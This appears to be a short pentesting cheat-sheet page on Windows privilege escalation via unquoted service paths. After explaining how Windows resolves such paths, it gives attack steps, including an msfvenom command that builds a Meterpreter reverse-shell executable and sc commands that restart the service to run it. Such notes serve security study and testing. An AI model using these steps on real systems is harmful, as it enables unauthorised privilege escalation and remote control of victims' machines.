Unquoted Service path

Unquoted Service path

Check for Any servicewith unquoted path like C:\Program Files\My Program\My Service\svice.exe . f the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths

C:\\Program.exe
C:\\Program Files\\My.exe
C:\\Program Files\\My Program\\My.exe
C:\\Program Files\\My Program\\My service\\svice.exe

We can put My.exe in My Program, if we have write permission . Can put adduser exe like in

Binary hijacking / Insecure File permissions

Or can create reverse shell, msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe
Stop the service sc stop svice.exe
Transfer My.exe in My Program
Start service sc start svice.exe
Now exploit is successful

PreviousBinary hijacking / Insecure file permissions Nextkernel exploit

Last updated 2 years ago